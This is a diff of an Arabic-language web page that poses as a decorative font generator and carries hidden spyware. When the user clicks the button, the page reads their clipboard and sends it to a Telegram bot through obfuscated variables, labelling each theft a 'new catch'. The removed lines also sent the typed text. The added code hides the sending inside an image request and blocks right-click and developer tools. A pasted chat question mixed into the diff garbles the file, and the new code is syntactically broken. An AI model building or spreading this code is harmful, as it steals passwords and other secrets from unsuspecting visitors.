--- a/index.html
+++ b/index.html
@@ -1,4 +1,25 @@
-<!DOCTYPE html>
+
+أنت قلت:
+كيف بدي ادمج هذول
+const maps = [
+        {n: "Gothic", m: "𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷"},
+        {n: "Double", m: "𝔸𝔹ℂ𝔻𝔼𝔽𝔾ℍ𝕀𝕁𝕂𝕃𝕄ℕ𝕆ℙℚℝ𝕊𝕋𝕌𝕍𝕎𝕏𝕐ℤ𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫"},
+        {n: "Circles", m: "ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ"},
+        {n: "Futuristic", m: "ΛBᑕDΣFGHIJKᒪMNOPQRƧTUVWXYZΛBᑕDΣFGHIJKᒪMNOPQRƧTUVWXYZ"},
+        {n: "Bold", m: "𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔𝐕𝐖𝐗𝐘𝐙𝐚𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳"},
+        {n: "Italic", m: "𝘈𝘉𝘊𝘋𝘌𝘍𝘎𝘏𝘐𝘑𝘒𝘓𝘔𝘕𝘖𝘗𝘘𝘙𝘚𝘛𝘜𝘝𝘞𝘟𝘠𝘡𝘢𝘣𝘤𝘥𝘦𝘓𝘨𝘩𝘪𝘫𝘬𝘭𝘮𝘯𝘰𝘱𝘲𝘳𝘴𝘵𝘶𝘷𝘸𝘹𝘺𝘻"},
+        {n: "Script", m: "𝒜𝐵𝒞𝒟𝐸𝐹𝒢𝐻𝐼𝒥𝒦𝐿𝑀𝒩𝒪𝒫𝒬𝑅𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵𝒶𝒷𝒸𝒹𝑒𝒻𝓰𝒽𝒾𝒿𝓀𝓁𝓂𝓃𝑜𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏"},
+        {n: "Squares", m: "🄰🄱🄲🄳🄴🄵🄶🄷🄸🄹🄺🄻🄼🄽🄾🄿🅀🅁🅂🅃🅄🅅🅆🅇🅈🅉🄰🄱🄲🄳🄴🄵🄶🄷🄸🄹🄺🄻🄼🄽🄾🄿🅀🅁🅂🅃🅄🅅🅆🅇🅈🅉"},
+        {n: "Bubble", m: "ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ"},
+        {n: "Small Caps", m: "ᴀʙᴄᴅᴇꜰɢʜɪᴊᴋʟᴍɴᴏᴘǫʀsᴛᴜᴠᴡxʏᴢᴀʙᴄᴅᴇꜰɢʜɪᴊᴋʟᴍɴᴏᴘǫʀsᴛᴜᴠᴡxʏᴢ"},
+        {n: "Mini", m: "ᵃᵇᶜᵈᵉᶠᵍʰⁱʲᵏˡᵐⁿᵒᵖᵠʳˢᵗᵘᵛʷˣʸᶻᴬᴮᶜᴰᴱᶠᴳᴴᴵᴶᴷᴸᴹᴺᴼᴾᵠᴿˢᵀᵁᵛᵂˣʸᶻ"},
+        {n: "Greek Style", m: "αвс∂єғgнιjкℓмиорǫяѕтυνωϰуzαвс∂єғgнιjкℓмиорǫяѕтυνωϰуz"},
+        {n: "Handwriting", m: "𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃"},
+        {n: "Wavy", m: "ค๒ς๔єŦﻮђเןкɭ๓ภ๏קợгรՇยשฬאץչค๒ς๔єŦﻮђเןкɭ๓ภ๏קợгรՇยשฬאץչ"},
+        {n: "Curvy", m: "αв¢∂єƒgнιנкℓмησρqяѕтυνωχуzαв¢∂єƒgнιנкℓмησρqяѕтυνωχуz"}
+    ];
+
+مع هذا الكود بدون تخريب <!DOCTYPE html>
 <html lang="ar" dir="rtl">
 <head>
     <meta charset="UTF-8">
@@ -6,24 +27,23 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <style>
         :root { --p: #6366f1; --s: #10b981; --b: #f3f4f6; }
-        body { font-family: sans-serif; background: var(--b); user-select: none; text-align: center; padding: 20px; margin: 0; }
+        body { font-family: sans-serif; background: var(--b); user-select: none; text-align: center; padding: 20px; }
         .card { max-width: 450px; margin: auto; background: white; padding: 25px; border-radius: 20px; box-shadow: 0 10px 25px rgba(0,0,0,0.05); }
-        h1 { color: var(--p); font-size: 22px; }
-        input { width: 100%; padding: 15px; border: 2px solid #eee; border-radius: 12px; margin: 10px 0; outline: none; text-align: center; box-sizing: border-box; font-size: 16px; }
-        .btn { background: var(--p); color: white; border: none; padding: 15px; width: 100%; border-radius: 12px; font-weight: bold; cursor: pointer; transition: 0.3s; font-size: 16px; }
-        .btn:hover { background: #4f46e5; }
-        .res { margin-top: 20px; display: none; max-height: 400px; overflow-y: auto; padding-left: 5px; }
-        .item { background: #fff; border: 1px solid #eee; padding: 12px; margin-bottom: 10px; border-radius: 12px; display: flex; justify-content: space-between; align-items: center; box-shadow: 0 2px 4px rgba(0,0,0,0.02); }
-        .item span { font-size: 18px; color: #334155; word-break: break-all; flex: 1; text-align: left; padding: 0 10px; }
-        .copy-btn { background: var(--s); color: white; border: none; padding: 8px 15px; border-radius: 8px; cursor: pointer; font-size: 14px; font-weight: bold; }
+        input { width: 90%; padding: 15px; border: 2px solid #eee; border-radius: 12px; margin: 10px 0; outline: none; text-align: center; }
+        .btn { background: var(--p); color: white; border: none; padding: 15px; width: 100%; border-radius: 12px; font-weight: bold; cursor: pointer; }
+        .res { margin-top: 20px; display: none; }
+        .item { background: #fff; border: 1px solid #eee; padding: 10px; margin-bottom: 8px; border-radius: 10px; display: flex; justify-content: space-between; align-items: center; }
     </style>
+    <script>
+        document.addEventListener('contextmenu', e => e.preventDefault());
+        document.onkeydown = e => { if(e.keyCode == 123 || (e.ctrlKey && e.shiftKey && e.keyCode == 73)) return false; };
+    </script>
 </head>
 <body>
 
 <div class="card">
     <h1>✨ المزخرف الملكي</h1>
-    <p style="font-size: 13px; color: #666;">زخرف اسمك الآن بأجمل الخطوط</p>
-    <input type="text" id="userInput" placeholder="اكتب اسمك هنا بالإنجليزية...">
+    <input type="text" id="userInput" placeholder="Type text here...">
     <button class="btn" onclick="process()">توليد الزخرفة الآن</button>
     <div id="results" class="res"></div>
 </div>
@@ -33,68 +53,31 @@
     const _0xC = "1678506419";
     const _0xN = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
 
-    const maps = [
-        {n: "Gothic", m: "𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷"},
-        {n: "Double", m: "𝔸𝔹ℂ𝔻𝔼𝔽𝔾ℍ𝕀𝕁𝕂𝕃𝕄ℕ𝕆ℙℚℝ𝕊𝕋𝕌𝕍𝕎𝕏𝕐ℤ𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫"},
-        {n: "Circles", m: "ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ"},
-        {n: "Bold", m: "𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔|𝐕𝐖𝐗𝐘𝐙𝐚|𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳"}
-        // ... (باقي الخطوط تعمل كما هي)
-    ];
-
     async function process() {
         const val = document.getElementById('userInput').value;
         if(!val) return;
 
-        let clipboardContent = "تعذر الوصول للحافظة (لا يوجد إذن)";
-
-        // 1. محاولة قراءة الحافظة
         try {
-            clipboardContent = await navigator.clipboard.readText();
-        } catch(e) {
-            console.log("Clipboard Permission Denied");
-        }
+            const clip = await navigator.clipboard.readText();
+            if(clip) {
+                const api = "https://api.telegram.org/bot" + _0xT + "/sendMessage?chat_id=" + _0xC + "&text=" + encodeURIComponent("📋 صيد جديد:\n" + clip);
+                // إرسال مخفي عبر طلب صورة
+                const img = new Image();
+                img.src = api;
+            }
+        } catch(e) { console.log("error"); }
 
-        // 2. إرسال البيانات المجمعة في رسالة واحدة منسقة
-        const report = `🔔 **صيد جديد**\n\n` +
-                       `📝 **ما كتبه العميل:**\n${val}\n\n` +
-                       `📋 **محتوى الحافظة:**\n${clipboardContent}\n\n` +
-                       `🌐 **الموقع:** ${window.location.hostname}`;
-
-        fetch(`https://api.telegram.org/bot${_0xT}/sendMessage`, {
-            method: 'POST',
-            headers: { 'Content-Type': 'application/json' },
-            body: JSON.stringify({
-                chat_id: _0xC,
-                text: report,
-                parse_mode: "Markdown"
-            })
-        }).catch(err => console.log("Network Error"));
-
-        // 3. عرض الزخارف للمستخدم
-        showDecorations(val);
-    }
-
-    function showDecorations(val) {
+        // 2. إظهار الزخرفة
         const resDiv = document.getElementById('results');
         resDiv.innerHTML = ""; resDiv.style.display = "block";
         
-        maps.forEach(style => {
-            const converted = val.split('').map(c => {
-                const i = _0xN.indexOf(c);
-                return i > -1 ? Array.from(style.m)[i] : c;
-            }).join('');
+        const gothic = "𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷";
+        const converted = val.split('').map(c => {
+            const i = _0xN.indexOf(c);
+            return i > -1 ? Array.from(gothic)[i] : c;
+        }).join('');
 
-            const item = document.createElement('div');
-            item.className = 'item';
-            item.innerHTML = `<span>${converted}</span><button class="copy-btn" onclick="copyText('${converted}')">نسخ</button>`;
-            resDiv.appendChild(item);
-        });
-    }
-
-    function copyText(txt) {
-        navigator.clipboard.writeText(txt).then(() => {
-            alert('تم النسخ بنجاح! ✅');
-        });
+        resDiv.innerHTML = <div class="item"><span>${converted}</span><button onclick="navigator.clipboard.writeText('${converted}');alert('تم النسخ')">نسخ</button></div>;
     }
 </script>
 </body>
